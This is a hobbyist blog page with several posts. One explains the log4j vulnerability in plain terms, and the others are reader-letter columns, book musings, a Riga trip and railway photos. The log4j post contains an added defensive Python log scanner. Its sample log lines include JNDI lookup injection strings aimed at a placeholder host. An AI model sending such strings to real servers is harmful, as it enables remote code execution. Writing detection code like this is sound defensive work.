
Symbolic Forest

A homage to loading screens.

Blog : Posts tagged with ‘E Shrdlu’

Some logical relief

In which we discuss a topical flaw

In many ways I lead a charmed life and hold a wide range of privileges in my hand. Not least, this week just gone, the fact that I’m a software developer who generally works with the .NET software stack. More specifically, I am not a software developer who works with Java. Java developers have not, generally speaking, been having a good week.

This is all because of a software vulnerability discovered just over a week ago in a Java library called “log4j”. To summarise, for non-experts: “log4j” is a logging library. No, not the let’s-clear-the-rainforests sort. “Logging” means your software writing diagnostic information as it goes along: records such as “user etoainshrdlu asked to see their bank balance at 9.10am from this address with that web browser”. You can see why…

Regular reader E Shrdlu (from Clacton) writes: Oi! You can’t go around giving my bank balance to people!

Hush now, I was just using you as an example! You can see why it’s useful to have this information stored away somewhere, and log4j is a software library that makes it really easy to do. Virtually all Java server-side code out there uses log4j somewhere inside it, to handle this sort of thing.

Unfortunately, log4j has a few features that were originally intended to be handy, but aren’t necessarily a good idea to have running on an internet-facing server that does important work such as processing your banking requests. Particularly, in this case, if you put a certain specialist type of URL into a log record, log4j will see it, try to download another program from it, and will then run that program in a certain well-defined way. Of course, you might say, there’s nothing wrong with that because all of the log record messages are just written by the bank’s own software developers, so everything’s perfectly safe. However, as I said above, one thing they may very well be logging is which browser you happen to be using, because that’s very useful diagnostic data if people start having problems. “Which browser you happen to be using”, though, is just a field that you send them, and if you know what you’re doing, you can change it to whatever you want to. Including a special type of URL which will…well, hopefully you get the picture. And now you’re running whatever programs you like on one of your bank’s internal servers. Ah. You can see now why Java developers have not been having a good week.
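For anyone on the defending side of that week, here is an added example (not part of the original post) of checking a web server's access log for lookup expressions arriving in fields the client controls, the "which browser" field included. It assumes the common "combined" log format and that the special URL arrives wrapped in log4j's `${...}` lookup syntax, which the post does not spell out; the log lines are constructed and the function names are hypothetical.

```python
import re

# Constructed sample lines ("combined" access-log format). Addresses and
# hosts are documentation placeholders, not real indicators.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Dec/2021:09:10:01 +0000] "GET /balance HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/95.0"',
    '203.0.113.9 - - [13/Dec/2021:09:10:07 +0000] "GET /balance HTTP/1.1" '
    '200 512 "-" "${jndi:ldap://placeholder.invalid/a}"',
    '203.0.113.9 - - [13/Dec/2021:09:10:09 +0000] "GET / HTTP/1.1" '
    '200 128 "${jndi:ldap://placeholder.invalid/b}" "Mozilla/5.0"',
    '198.51.100.2 - - [13/Dec/2021:09:11:30 +0000] "GET /login HTTP/1.1" '
    '302 0 "https://bank.example/" "curl/7.79.1"',
]

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Genuine browsers never send "${" in these fields, so the opening of any
# lookup expression is enough to flag the line for review.
LOOKUP_START = re.compile(r'\$\{')

# Every one of these is chosen by whoever sends the request.
CLIENT_FIELDS = ("request", "referer", "agent")


def suspicious_fields(line):
    """Return the client-controlled fields of one log line that contain a lookup."""
    match = COMBINED.match(line)
    if match is None:
        # Do not silently skip lines the parser cannot read.
        return ["unparsed"]
    return [f for f in CLIENT_FIELDS if LOOKUP_START.search(match.group(f))]


def scan(lines):
    """Return (line_number, fields) for every line worth a closer look."""
    findings = []
    for number, line in enumerate(lines, 1):
        fields = suspicious_fields(line)
        if fields:
            findings.append((number, fields))
    return findings


if __name__ == "__main__":
    for number, fields in scan(SAMPLE_LOG):
        print(f"line {number}: lookup expression in {', '.join(fields)}")
```

A hit shows that someone sent such a string, not that the server acted on it; whether it mattered depends on whether a vulnerable log4j ever logged that field.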

The fix for this is straightforward, but rolling the fix out will have involved a huge proportion of the Java code running in the world being checked, double-checked, and redeployed when it’s known to be safe. Moreover, all of the developers doing this will have had several queries a day from their managers asking just how much they are exposed to this issue. I know: I’ve had several myself, even though my response is straightforwardly “we don’t run any Java code at all, so don’t worry.” I do tell them to tell the clients we have thoroughly and conscientiously audited our systems because from a client-relations point of view it does sound a bit more professional than “no, and our tech lead is very glad of her career choices”. But it still means plenty of messages for me to answer.

Incidentally, I don’t feel any sort of schadenfreude about this, in case you were wondering. I genuinely feel sorry for a lot of people I know, who will not have had a good week fixing this stuff. I’ve worked in big banks and other similar organisations, and I know a lot of former colleagues and current friends who will have spent the last week focusing on this above all else. It’s not nice when you are suddenly bowled by a risk like this; and moreover, it’s not as if Java is uniquely likely to suffer from this type of problem. There are nuances to this that I may come back to in a later post; but next time something like this happens, the person fixing it might well be me.

Readers' Letters

Or, some of your questions answered

Time to answer some of the questions that have been sent in over the month or so since I revived this site.

Occasional reader Harold from Winchester read yesterday’s post about the Battle of Hastings and wrote:

Didn’t you write about that before?

Well, yes, it turns out that exactly ten years ago today I also wrote a “what might have happened if the outcome of the Battle of Hastings was different” post, including the same story of how the outcome was nearly different, and the side comments on how the battle has always been treated in English historiography. I suppose, if anything, it’s interesting to read the two side by side and see if my opinions have changed much over the past ten years, or if my writing style has evolved in the meantime too. Let me know if you think it’s better or worse than it used to be.

Regular reader Sarah from Ipswich writes:

Can I come with you on one of your trips to Wales?

Frankly, I wish I was going to Wales in the near future. All the nearby bits of Wales are closed to visitors at the moment, though. At some point I need to get myself back up to North-West Wales and visit the trains again, of course. Hopefully that will happen, even if it doesn’t now happen this year. As for the nearer bits of Wales: well, we’ll have to see how things progress I suppose.

And finally, long-time reader E Shrdlu of Clacton writes:

Now you’ve brought this website back from the dead, are you still going to keep up the same running jokes and bring back all those series of posts you used to do years and years ago, like reviewing books you hadn’t finished?

Back in the mists of time I did indeed write reviews of books I hadn’t finished reading. I suppose you could call it a deconstruction of sorts, or an exercise in honesty, because they were at least all (I think) books I had tried to read, and failed to finish. Investigating why I failed to finish a particular book is interesting in itself, and admitting I didn’t finish it is more honest than just writing a review and saying “this is a bad book”. Moreover, if you read through those posts, you’ll see there were a broad range of different reasons for not finishing each book. One of them ended up being found by its author, who I had carefully not accused of plagiarism because I knew he was a former top barrister with lots more money than me.

I have to admit, I’m in the middle of drafting the next Books I Haven’t Read article. It’s probably going to be quite a long article, because it’s about quite a long book. I’ve also made sure it’s by a safely-dead author, so I can freely express my opinions about their poor understanding of archaeology or their failed attempt at polyamory. Feel free to guess who, and what, it’s going to be about; it’s a complex book, a complex topic, and it’s probably going to take me a while to finish it.

Strange Loop

In which things get into a circular reference

Things go around in circles. This site has been quiet for a while in the past, more than once, and it will probably happen again in the future at some point. I can’t tell when, but it will probably happen.

Still, a new year is as good a time for a new start as any, even though I try not to believe in arbitrary starting-points. It’s hard to avoid it at this time of year, though: forced to stay away from work, expected to visit the family, exchange gifts, rest for a week and recover ready for the new year’s start. I’ve been staying in and reading one of the books I received for Christmas: Gödel, Escher, Bach: an Eternal Golden Braid, by Douglas Hofstadter. It’s a long book, a complex book, and I haven’t finished it yet: but its essence is in loops, looping, and self-referentiality. How self-referentiality is necessary, as a minimum, before self-awareness can occur. It seems like an ideal thing to talk about on a blog which has always been highly aware that it’s a blog, but I’m not sure if I’ve taken in enough of the book to write about it yet. “It’s got a lot of equations in it,” said The Mother, giving it to me. It does have, true; it also has some truly awful puns, intertwined and nested ideas, and dialogues between fictional and/or appropriated characters who butt into the discussion on a regular basis.

Funnily enough, a letter came the other day from regular reader E. Shrdlu of Clacton-on-Sea…

The Plain People Of The Internet: Hurrah! We were wondering when that chap would pop up again. We were worried he’d got stuck putting shapes into boxes, or analysing what kind of linoleum he has in his kitchen.

Hush, you. As I was saying, a letter came, from semi-regular reader E. Shrdlu of Clacton-on-Sea:

“Gödel, Escher, Bach” is quite a work to try to emulate, isn’t it? Maybe you should try something simpler. Never mind the parallels between human consciousness, a baroque composer and a 20th-century artist: have you thought about the links between something simpler, like TV ghost stories and the British railway preservation movement? Or maybe: the parallels between the work of Robert Graves and books like “Holy Blood, Holy Grail”. Something nice and straightforward like that.

It’s an interesting idea there. Maybe I should indeed be starting off along those lines. Over the next few weeks and months, I’ll be writing a critique of a piece of writing I read for the first time a few days ago. It starts like this:

Things go around in circles. This site has been quiet for a while in the past, more than once, and it will probably happen again in the future at some point. I can’t tell when, but it will probably happen.

Still, a new year is as good a time for a new start as any, even though I try not to believe in arbitrary starting-points…

Somehow, I think I might be onto something.

Excitement

In which we anticipate a holiday

I’ve already told this to just about everyone, because I’m bouncing up and down already. In a few weeks’ time, we’re off on holiday. To Riga! I thought I’d mention it here, though, just to say: if any readers know anything good to do in Riga in winter, let me know. I know it’s a long-shot, but you never know who reads this and where they’ve been.

Mr E Shrdlu of Clacton writes: “I’ve been to Clacton!”

Yes, I know you have. Shush there.

Readers' Letters

In which the readers speak up and demand photos

Here at Symbolic Towers, we pay attention to our readers. If they send in tips, we pass them on. Mr E Shrdlu of Clacton writes…

The Plain People of the Internet: You say what? You had a letter? From a reader? Whose name is E Shrdlu? Honestly?

Me: Shush there. Be quiet and listen.

The Plain People of the Internet: If you say so. But don’t expect us to believe it.

… E Shrdlu of Clacton, who writes:

People who liked Friday’s post may be interested in…

The Plain People of the Internet: You mean, people who like long posts about the history of the London Underground? When posts like yesterday’s get a much better reader reaction? What are you thinking about?

Me: Come on there, stop interrupting. And since when have I been bothered about reader reaction, in any case?

The Plain People of the Internet: We’re only saying. Offering a tidbit ourselves, you could say.

… may be interested in the book London’s Secret Tubes by Emmerson and Beard, which goes into all that stuff. At book length.

The Plain People of the Internet: Now, we wouldn’t mind seeing photos of that beautiful Yorkshire scenery you were wittering on about. That “unutterable beauty” stuff.

Me: It was “unassuming beauty”. And I don’t have any – the car would have rolled down the hill. Carnage.

The Plain People of the Internet: My god, that’s terrible. The joke, we mean.

Me: If you’re so plural, shouldn’t that be “our god”? The best I can do is photos of trains down in the mist-filled dale. And why shouldn’t there be real people called E Shrdlu, from Clacton?

The Plain People of the Internet: Flann O’Brien would sue, were he still alive.

Grosmont station

Grosmont yard

Inside Deviation Shed, Grosmont

Train passing Grosmont yard